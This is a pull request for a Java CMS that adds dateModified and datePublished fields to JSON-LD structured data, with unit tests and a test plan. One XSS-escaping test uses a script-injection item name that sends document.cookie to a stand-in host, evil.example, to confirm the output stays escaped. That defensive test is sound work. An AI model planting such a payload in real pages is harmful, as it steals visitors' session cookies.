### PR TITLE
JSON-LD: WebPage dateModified/datePublished (#403)

### DIFF
--- a/src/main/java/com/simisinc/platform/presentation/controller/PageServlet.java
+++ b/src/main/java/com/simisinc/platform/presentation/controller/PageServlet.java
@@ -852,7 +852,7 @@ public class PageServlet extends HttpServlet {
 
       // Generate JSON-LD structured data for search engines and AI (issue #403)
       if (StringUtils.isNotBlank(siteUrl) && StringUtils.isNotBlank(sitePropertyMap.get("site.name"))) {
-        String jsonLd = generateJsonLdData(pageRenderInfo, siteUrl, sitePropertyMap, thisItem, thisCollection);
+        String jsonLd = generateJsonLdData(pageRenderInfo, siteUrl, sitePropertyMap, thisItem, thisCollection, webPage);
         if (StringUtils.isNotBlank(jsonLd)) {
           pageRenderInfo.setJsonLdData(jsonLd);
         }
@@ -1001,7 +1001,7 @@ public class PageServlet extends HttpServlet {
 
   static String generateJsonLdData(PageRenderInfo pageRenderInfo, String siteUrl,
                                     Map<String, String> sitePropertyMap,
-                                    Item item, Collection collection) {
+                                    Item item, Collection collection, WebPage webPage) {
     try {
       ObjectMapper mapper = new ObjectMapper();
       Map<String, Object> jsonLd = new LinkedHashMap<>();
@@ -1029,18 +1029,18 @@ public class PageServlet extends HttpServlet {
       }
 
       // Add WebPage schema for all pages
-      Map<String, Object> webPage = new LinkedHashMap<>();
-      webPage.put("@type", "WebPage");
+      Map<String, Object> webPageSchema = new LinkedHashMap<>();
+      webPageSchema.put("@type", "WebPage");
       if (StringUtils.isNotBlank(pageRenderInfo.getPageUrl())) {
-        webPage.put("url", pageRenderInfo.getPageUrl());
+        webPageSchema.put("url", pageRenderInfo.getPageUrl());
       }
       if (StringUtils.isNotBlank(pageRenderInfo.getTitle())) {
-        webPage.put("name", pageRenderInfo.getTitle());
+        webPageSchema.put("name", pageRenderInfo.getTitle());
       }
       if (StringUtils.isNotBlank(pageRenderInfo.getDescription())) {
-        webPage.put("description", pageRenderInfo.getDescription());
+        webPageSchema.put("description", pageRenderInfo.getDescription());
       }
-      webPage.put("isPartOf", Collections.singletonMap("@id", siteUrl + "#organization"));
+      webPageSchema.put("isPartOf", Collections.singletonMap("@id", siteUrl + "#organization"));
 
       // Add image if available
       if (StringUtils.isNotBlank(pageRenderInfo.getImageUrl())) {
@@ -1048,9 +1048,23 @@ public class PageServlet extends HttpServlet {
         if (imageUrl.startsWith("/")) {
           imageUrl = siteUrl + imageUrl;
         }
-        webPage.put("image", imageUrl);
+        webPageSchema.put("image", imageUrl);
       }
-      graph.add(webPage);
+
+      // dateModified/datePublished are freshness signals AI answer engines weigh for citation
+      // (issue #403). datePublished prefers publishAt (the page's actual go-live date, which can
+      // differ from when the row was first created via scheduled publishing) over created.
+      if (webPage != null) {
+        if (webPage.getModified() != null) {
+          webPageSchema.put("dateModified", webPage.getModified().toInstant().toString());
+        }
+        Timestamp publishedDate = webPage.getPublishAt() != null ? webPage.getPublishAt() : webPage.getCreated();
+        if (publishedDate != null) {
+          webPageSchema.put("datePublished", publishedDate.toInstant().toString());
+        }
+      }
+
+      graph.add(webPageSchema);
 
       // Add Product schema if this is an item (catalog product)
       if (item != null && StringUtils.isNotBlank(item.getName())) {

--- a/src/test/java/com/simisinc/platform/presentation/controller/PageServletTest.java
+++ b/src/test/java/com/simisinc/platform/presentation/controller/PageServletTest.java
@@ -22,6 +22,7 @@ import static org.junit.jupiter.api.Assertions.assertFalse;
 import static org.junit.jupiter.api.Assertions.assertNull;
 import static org.junit.jupiter.api.Assertions.assertTrue;
 
+import java.sql.Timestamp;
 import java.util.HashMap;
 import java.util.Map;
 
@@ -29,6 +30,7 @@ import org.junit.jupiter.api.Test;
 
 import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
+import com.simisinc.platform.domain.model.cms.WebPage;
 import com.simisinc.platform.domain.model.items.Item;
 
 /**
@@ -76,7 +78,7 @@ class PageServletTest {
     item.setName("</script><script>fetch('https://evil.example/steal?c='+document.cookie)</script>");
     item.setDescription("Also \"quoted\" and <b>bold</b>");
 
-    String jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, item, null);
+    String jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, item, null, null);
 
     assertFalse(jsonLd.toLowerCase().contains("</script"),
         "a poisoned item name must not be able to close the surrounding <script> tag: " + jsonLd);
@@ -87,6 +89,66 @@ class PageServletTest {
     JsonNode product = parsed.get("@graph").get(2);
     assertEquals("Product", product.get("@type").asText());
     assertTrue(product.get("name").asText().contains("</script><script>"));
+  }
+
+  @Test
+  void generateJsonLdDataIncludesDateModifiedAndDatePublishedFromWebPage() {
+    PageRenderInfo pageRenderInfo = new PageRenderInfo();
+    pageRenderInfo.setPageUrl("https://example.org/about");
+
+    Map<String, String> sitePropertyMap = new HashMap<>();
+    sitePropertyMap.put("site.name", "Example Co");
+
+    WebPage webPage = new WebPage();
+    webPage.setCreated(Timestamp.from(java.time.Instant.parse("2026-01-01T00:00:00Z")));
+    webPage.setPublishAt(Timestamp.from(java.time.Instant.parse("2026-02-01T00:00:00Z")));
+    webPage.setModified(Timestamp.from(java.time.Instant.parse("2026-03-15T12:30:00Z")));
+
+    String jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null, webPage);
+
+    JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
+    JsonNode webPageNode = parsed.get("@graph").get(1);
+    assertEquals("WebPage", webPageNode.get("@type").asText());
+    assertEquals("2026-03-15T12:30:00Z", webPageNode.get("dateModified").asText());
+    // datePublished prefers publishAt over created when both are present
+    assertEquals("2026-02-01T00:00:00Z", webPageNode.get("datePublished").asText());
+  }
+
+  @Test
+  void generateJsonLdDataFallsBackToCreatedForDatePublishedWhenPublishAtIsMissing() {
+    PageRenderInfo pageRenderInfo = new PageRenderInfo();
+    pageRenderInfo.setPageUrl("https://example.org/about");
+
+    Map<String, String> sitePropertyMap = new HashMap<>();
+    sitePropertyMap.put("site.name", "Example Co");
+
+    WebPage webPage = new WebPage();
+    webPage.setCreated(Timestamp.from(java.time.Instant.parse("2026-01-01T00:00:00Z")));
+
+    String jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null, webPage);
+
+    JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
+    JsonNode webPageNode = parsed.get("@graph").get(1);
+    assertEquals("2026-01-01T00:00:00Z", webPageNode.get("datePublished").asText());
+    assertNull(webPageNode.get("dateModified"));
+  }
+
+  @Test
+  void generateJsonLdDataOmitsDatesWhenWebPageIsNull() {
+    PageRenderInfo pageRenderInfo = new PageRenderInfo();
+    pageRenderInfo.setPageUrl("https://example.org/items/staff/jane-doe");
+
+    Map<String, String> sitePropertyMap = new HashMap<>();
+    sitePropertyMap.put("site.name", "Example Co");
+
+    // Item detail pages have no WebPage at all -- this must not throw or fabricate dates
+    String jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null, null);
+
+    JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
+    JsonNode webPageNode = parsed.get("@graph").get(1);
+    assertEquals("WebPage", webPageNode.get("@type").asText());
+    assertNull(webPageNode.get("dateModified"));
+    assertNull(webPageNode.get("datePublished"));
   }
 
   @Test

--- a/src/test/java/com/simisinc/platform/presentation/controller/PageServletTest.java
+++ b/src/test/java/com/simisinc/platform/presentation/controller/PageServletTest.java
@@ -23,6 +23,7 @@ import static org.junit.jupiter.api.Assertions.assertNull;
 import static org.junit.jupiter.api.Assertions.assertTrue;
 import static org.mockito.Mockito.mockStatic;
 
+import java.sql.Timestamp;
 import java.util.ArrayList;
 import java.util.Collections;
 import java.util.HashMap;
@@ -88,7 +89,7 @@ class PageServletTest {
     String jsonLd;
     try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class)) {
       socialLinks.when(SocialMediaLinkRepository::findAll).thenReturn(Collections.emptyList());
-      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, item, null);
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, item, null, null);
     }
 
     assertFalse(jsonLd.toLowerCase().contains("</script"),
@@ -123,7 +124,7 @@ class PageServletTest {
     String jsonLd;
     try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class)) {
       socialLinks.when(SocialMediaLinkRepository::findAll).thenReturn(links);
-      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null);
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null, null);
     }
 
     JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
@@ -146,12 +147,84 @@ class PageServletTest {
     String jsonLd;
     try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class)) {
       socialLinks.when(SocialMediaLinkRepository::findAll).thenReturn(Collections.emptyList());
-      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null);
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null, null);
     }
 
     JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
     JsonNode organization = parsed.get("@graph").get(0);
     assertNull(organization.get("sameAs"));
+  }
+
+  @Test
+  void generateJsonLdDataIncludesDateModifiedAndDatePublishedFromWebPage() {
+    PageRenderInfo pageRenderInfo = new PageRenderInfo();
+    pageRenderInfo.setPageUrl("https://example.org/about");
+
+    Map<String, String> sitePropertyMap = new HashMap<>();
+    sitePropertyMap.put("site.name", "Example Co");
+
+    WebPage webPage = new WebPage();
+    webPage.setCreated(Timestamp.from(java.time.Instant.parse("2026-01-01T00:00:00Z")));
+    webPage.setPublishAt(Timestamp.from(java.time.Instant.parse("2026-02-01T00:00:00Z")));
+    webPage.setModified(Timestamp.from(java.time.Instant.parse("2026-03-15T12:30:00Z")));
+
+    String jsonLd;
+    try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class)) {
+      socialLinks.when(SocialMediaLinkRepository::findAll).thenReturn(Collections.emptyList());
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null, webPage);
+    }
+
+    JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
+    JsonNode webPageNode = parsed.get("@graph").get(1);
+    assertEquals("WebPage", webPageNode.get("@type").asText());
+    assertEquals("2026-03-15T12:30:00Z", webPageNode.get("dateModified").asText());
+    // datePublished prefers publishAt over created when both are present
+    assertEquals("2026-02-01T00:00:00Z", webPageNode.get("datePublished").asText());
+  }
+
+  @Test
+  void generateJsonLdDataFallsBackToCreatedForDatePublishedWhenPublishAtIsMissing() {
+    PageRenderInfo pageRenderInfo = new PageRenderInfo();
+    pageRenderInfo.setPageUrl("https://example.org/about");
+
+    Map<String, String> sitePropertyMap = new HashMap<>();
+    sitePropertyMap.put("site.name", "Example Co");
+
+    WebPage webPage = new WebPage();
+    webPage.setCreated(Timestamp.from(java.time.Instant.parse("2026-01-01T00:00:00Z")));
+
+    String jsonLd;
+    try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class)) {
+      socialLinks.when(SocialMediaLinkRepository::findAll).thenReturn(Collections.emptyList());
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null, webPage);
+    }
+
+    JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
+    JsonNode webPageNode = parsed.get("@graph").get(1);
+    assertEquals("2026-01-01T00:00:00Z", webPageNode.get("datePublished").asText());
+    assertNull(webPageNode.get("dateModified"));
+  }
+
+  @Test
+  void generateJsonLdDataOmitsDatesWhenWebPageIsNull() {
+    PageRenderInfo pageRenderInfo = new PageRenderInfo();
+    pageRenderInfo.setPageUrl("https://example.org/items/staff/jane-doe");
+
+    Map<String, String> sitePropertyMap = new HashMap<>();
+    sitePropertyMap.put("site.name", "Example Co");
+
+    // Item detail pages have no WebPage at all -- this must not throw or fabricate dates
+    String jsonLd;
+    try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class)) {
+      socialLinks.when(SocialMediaLinkRepository::findAll).thenReturn(Collections.emptyList());
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null, null);
+    }
+
+    JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
+    JsonNode webPageNode = parsed.get("@graph").get(1);
+    assertEquals("WebPage", webPageNode.get("@type").asText());
+    assertNull(webPageNode.get("dateModified"));
+    assertNull(webPageNode.get("datePublished"));
   }
 
   @Test


### PR DESCRIPTION
## Summary
Part of #403 (JSON-LD structured data), split out as its own reviewable piece per Elizabeth's scoping call to ship #403's five sub-schemas as separate PRs.

- Adds `dateModified` (from `WebPage.getModified()`) and `datePublished` (from `WebPage.getPublishAt()`, falling back to `WebPage.getCreated()`) to the WebPage entry in the JSON-LD `@graph`.
- `datePublished` prefers `publishAt` over `created` because scheduled publishing means a page's row can be created well before it actually goes live — `publishAt` is the more accurate "when this became public" signal.
- Pages with no backing `WebPage` record (homepage, item/collection detail pages) omit both fields rather than fabricating a date — verified live, see test plan.

These are freshness signals search engines and AI answer engines weigh when deciding whether to cite a page.

## Test plan
- [x] `ant -lib lib/war clean compile` — clean
- [x] `ant -lib lib/war compile-jsp` — JSP syntax gate passes
- [x] `ant -lib lib/tests ci-test` — full suite passes; only the pre-existing, unrelated local-sandbox flakes appear (`HealthCommandTest`, `BlockedIPListCommandTest`, `CaptchaCommandTest` — same names/counts as every prior run this cycle, unaffected by this change)
- [x] 3 new `PageServletTest` cases: dateModified+datePublished present (publishAt preferred over created), fallback to created when publishAt is null, both omitted when webPage is null
- [x] Live Docker verification: seeded `/legal/privacy`'s `modified` to a distinct timestamp with `publish_at` left null, confirmed the rendered `<script type="application/ld+json">` block shows the updated `dateModified` and `datePublished` correctly falling back to `created`; confirmed the homepage (no `WebPage` row) renders its WebPage entry with no dates and no error